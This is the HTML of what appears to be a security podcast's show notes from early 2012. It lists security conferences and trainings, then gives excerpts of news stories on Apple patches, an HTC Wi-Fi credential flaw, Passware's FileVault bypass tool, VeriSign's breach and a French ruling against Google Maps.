	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple has released a massive set of patches for a wide range of security vulnerabilities in a number of its products and components, including OSX Lion and QuickTime. The patches, which are rolled up in OS X 10.7.3, fix a slew of serious bugs, many of which can be used to execute remote code on vulnerable machines.</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the more serious vulnerabilities Apple fixed is the flaw that researchers</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Juliano Rizzo and Thai Duong discovered in the TLS 1.0 and SSL 3.0 protocols last year. The vulnerability, for which they wrote a proof-of-concept exploit tool called BEAST, is fixed in the new version of Apache that</span><a href="https://support.apple.com/kb/HT5130"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Apple included in yesterday&#39;s patches</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. Exploiting the flaw enables an attacker to decrypt some SSL sessions.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. Apache disabled the &#39;empty fragment&#39; countermeasure which prevented these attacks. This issue is addressed by providing a configuration parameter to control the countermeasure and enabling it by default,&quot; Apple said in its advisory.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple also pushed out an update that revokes trust in some of the certificates issued by Malaysian CA DigiCert that were found last year to contain weak cryptographic keys.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://www.pcadvisor.co.uk/news/mobile-phone/3334795/htc-vows-fix-android-flaw-revealing-wi-fi-credentials/?olo=rss"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/mobile-phone/3334795/htc-vows-fix-android-flaw-revealing-wi-fi-credentials/?olo=rss</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HTC is moving quickly to squash a security flaw that could expose Wi-Fi credentials on the company&#39;s Android phones.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Using an app that takes advantage of this flaw, an attacker could harvest SSID names and passwords for all wireless networks that the phone has accessed. For average consumers, this isn&#39;t a huge concern, but as researchers Chris Hessing and Bret Jordan note, the exploit &ldquo;exposes enterprise-privileged credentials in a manner that allows targeted exploitation.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The affected phones are the Desire HD (both &quot;ace&quot; and &quot;spade&quot; board revisions) Versions FRG83D and GRI40; Glacier Version FRG83; Droid Incredible Version FRF91; Thunderbolt 4G Version FRG83D; Sensation Z710e Version GRI40; Sensation 4G &#8211; Version GRI40; Desire S &#8211; Version GRI40; EVO 3D Version GRI40; and EVO 4G Version GRI40. HTC&#39;s MyTouch 3G and Google Nexus One are not affected.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HTC has acknowledged the issue, and says most phones have already received a fix through regular updates. Other phones, however, will require users to manually load the fix. The company says it will have more information on the matter next week.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://news.softpedia.com/news/Hackers-from-US-and-China-Responsible-for-40-of-Hack-Attempts-250311.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Hackers-from-US-and-China-Responsible-for-40-of-Hack-Attempts-250311.shtml</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A study released by security firm NCC reveals the origins of most hacking operations and the estimated damages they cause to the global economy each year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The numbers show that hackers from the UK cost the global economy over $2 billion (1.4 billion EUR) in the year that passed, counting a total of 23 million hack attempts.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While this puts the United Kingdom on the 15th place on a global chart, the first two positions are occupied by China and the United States, the operations launched by cybercriminals from these countries costing the global economy around $44 billion (31 billion EUR).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Reading the papers each day, it&rsquo;s easy to think of hacking as something that happens to us from afar; that we&rsquo;re victims of foreign criminal gangs in developing countries. Yet hackers can be anywhere in the world, as our research illustrates, including on our own doorstep,&rdquo; Rob Cotton, NCC Group&rsquo;s chief executive said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">US and China are followed on the global list by Russia, Brazil, Italy, Netherlands, France, Denmark, Germany and India.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s somewhat surprising that so many highly developed European countries have such a great contribution to the hacking attempts recorded worldwide, counting around 200 million attempted hacks with consequences translating into costs of $16 billion (11 billion EUR) each year. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://nakedsecurity.sophos.com/2012/02/02/filevault-encryption-broken/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/02/02/filevault-encryption-broken/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">California-based forensics software vendor Passware has released the latest version of its toolkit, which the company claims can bypass Apple&#39;s FileVault 2 disk encryption &quot;in minutes,&quot; as well as volumes encrypted with TrueCrypt.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The software is reportedly able to capture the contents of a computer&#39;s memory via FireWire (also known as IEEE 1394 or i.LINK), analyze the memory dump, and extract the encryption keys. Passware claims that the software can recover passwords from decrypted Mac OS X keychain files as well.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Previous and current versions of Passware&#39;s software are also able to bypass Microsoft&#39;s BitLocker encryption which is built into some editions of Windows.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although Passware seems to mainly market its software to government and law enforcement agencies and military organizations, anyone with US $795 can purchase an edition of Passware Kit that includes these features. Interestingly, Passware also lists Apple, Microsoft, Intel, and several other major tech companies among its customers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For those who might find all this concerning, it is important to note a few important caveats.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">First, Passware&#39;s software requires physical access to a computer with a working FireWire port; a remote internet attacker cannot use it to break into your Mac or PC.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.pcmag.com/article2/0,2817,2399773,00.asp"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2399773,00.asp</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VeriSign was hit by hackers in 2010 and its computers and servers were accessed several times, but the breach was not properly reported until late last year.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The information was revealed in an October</span><a href="http://www.sec.gov/Archives/edgar/data/1014473/000119312511285850/d219781d10q.htm"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">filing</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with the Securities and Exchange Commission (SEC) and</span><a href="http://www.reuters.com/article/2012/02/02/us-hacking-verisign-idUSTRE8110Z820120202"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">reported today</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> by Reuters.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In 2010, the Company faced several successful attacks against its corporate network in which access was gained to information on a small portion of our computers and servers,&quot; VeriSign said. &quot;We have investigated and do not believe these attacks breached the servers that support our Domain Name System (&#39;DNS&#39;) network.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information was stolen, though VeriSign did not provide details on what went missing.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But while the hacks occurred in 2010, VeriSign&#39;s information security group did not tell management about the attacks until September 2011. VeriSign said it has since changed its reporting policies to make sure the same thing doesn&#39;t happen again.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information was stolen, though VeriSign did not provide details on what went missing.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But while the hacks occurred in 2010, VeriSign&#39;s information security group did not tell management about the attacks until September 2011. VeriSign said it has since changed its reporting policies to make sure the same thing doesn&#39;t happen again.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The group implemented remedial measures designed to mitigate the attacks and to detect and thwart similar additional attacks. However, given the nature of such attacks, we cannot assure that our remedial actions will be sufficient to thwart future attacks or prevent the future loss of information,&quot; VeriSign said in its filing. &quot;In addition, although the Company is unaware of any situation in which possibly exfiltrated information has been used, we are unable to assure that such information was not or could not be used in the future.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VeriSign did not immediately respond to a request for additional comment.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://boingboing.net/2012/02/02/french-court-rules-that-its.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://boingboing.net/2012/02/02/french-court-rules-that-its.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A French court has ruled that Google&#39;s free Google Maps application API is anti-competitive and has ordered the company to pay &euro;500,000 to Bottin Cartographes, a for-pay map company, as well as a &euro;15,000 fine. Bottin Cartographes argued that Google was only planning to give away the service for free until all the competitors had been driven out of business and then they would start charging. This seems implausible to me, and contrary to Google&#39;s business model (give away services, make money from mining the use of those services). Google says it will appeal.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is the end of a two-year battle, a decision without precedent,&quot; said the lawyer for Bottin Cartographes, Jean-David Scemmama.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We proved the illegality of (Google&#39;s) strategy to remove its competitors&#8230; the court recognised the unfair and abusive character of the methods used and allocated Bottin Cartographes all it claimed. This is the first time Google has been convicted for its Google Maps application,&quot; he said.</span></p>
<p>&nbsp;</p>
